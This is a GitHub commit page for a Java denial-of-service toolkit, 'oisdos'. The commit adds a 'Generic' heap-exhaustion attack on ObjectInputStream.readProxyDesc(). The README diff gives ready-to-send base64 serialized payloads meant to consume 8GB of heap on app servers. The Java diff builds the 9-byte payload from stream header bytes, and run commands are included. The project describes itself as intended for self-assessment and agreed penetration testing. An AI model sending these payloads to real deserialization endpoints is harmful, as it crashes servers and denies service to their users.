Permalink
Browse files

Heap overflow attack on ObjectInputStream.readProxyDesc()

  • Loading branch information...
topolik committed Oct 21, 2016
1 parent 266a73b commit 0f38694a9453348252f2d9a918f86aa45e33d809
Showing with 28 additions and 4 deletions.
  1. +9 −2 README.md
  2. +17 −0 src/main/java/cz/topolik/OISDoS.java
  3. +2 −2 src/main/java/cz/topolik/oisdos/OISHeapOverflowAttack.java
View
@@ -6,14 +6,19 @@ Provided as-is, only for self-assessment, agreed pen-testing purposes, etc.
## Basic Scenarios
* Heap Dos using nested Object[], ArrayList and HashMap
* Generic Heap DoS inside ObjectInputStream
* Heap DoS using nested Object[], ArrayList and HashMap
* Collision attack on Hashtable
* Collision attack on HashMap (Oracle Java 1.7)
## Payloads for 8GB heap consumption
Should be enough to test the vulnerability in most app servers.
Generic (9 bytes):
rO0ABX1////3
Nested Object[] (44 bytes):
rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cH////c=
@@ -39,7 +44,9 @@ Nested HashMap (110 bytes):
E.g:
java -Xmx25g -jar target/oisdos-1.0.jar ObjectArrayHeap
java -Xmx25g -jar target/oisdos-1.0.jar Generic
java -Xmx25g -jar target/oisdos-1.0.jar ArrayListHeap
java -Xmx25g -jar target/oisdos-1.0.jar HashtableCollisions 5000
@@ -7,10 +7,12 @@
import org.apache.commons.codec.binary.Base64;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.EOFException;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.OptionalDataException;
import java.nio.ByteBuffer;
/**
@@ -28,6 +30,7 @@ public static void main(String[] args) throws Exception {
if (type == null) {
System.out.println("Syntax: OISDoS type [param]");
System.out.println("\t type");
System.out.println("\t\t ... Generic - Heap Overflow using proxyClassDesc interfaces number (fixed to 8GB)");
System.out.println("\t\t ... ObjectArrayHeap - Heap Overflow using Object[]");
System.out.println("\t\t ... ArrayListHeap - Heap Overflow using ArrayList");
System.out.println("\t\t ... HashMapHeap - Heap Overflow using HashMap");
@@ -42,6 +45,20 @@ public static void main(String[] args) throws Exception {
System.exit(1);
}
if ("Generic".equalsIgnoreCase(type)) {
byte[] payload = ByteBuffer.allocate(9)
.putShort((short) 0xACED) // STREAM_MAGIC
.putShort((short) 0x0005) // STREAM_VERSION
.put((byte)0x7D) // TC_PROXYCLASSDESC
.putInt(OISHeapOverflowAttack.MAX_ARRAY_SIZE).array();
System.out.print("Generating Generic heap overflow (8GB) using a payload of size ");
System.out.println(payload.length);
read(payload);
}
if ("ObjectArrayHeap".equalsIgnoreCase(type)) {
int heapSizeIn8Gigs = 1;
if (args.length > 1) {
@@ -12,8 +12,8 @@
* @author Tomas Polesovsky
*/
public class OISHeapOverflowAttack {
private static final int MAX_ARRAY_SIZE;
private static final int MAXIMUM_CAPACITY;
public static final int MAX_ARRAY_SIZE;
public static final int MAXIMUM_CAPACITY;
private static final int OBJECT_ARRAY_SIZE_TEMP_VAL = 1234;
static {

0 comments on commit 0f38694

Please sign in to comment.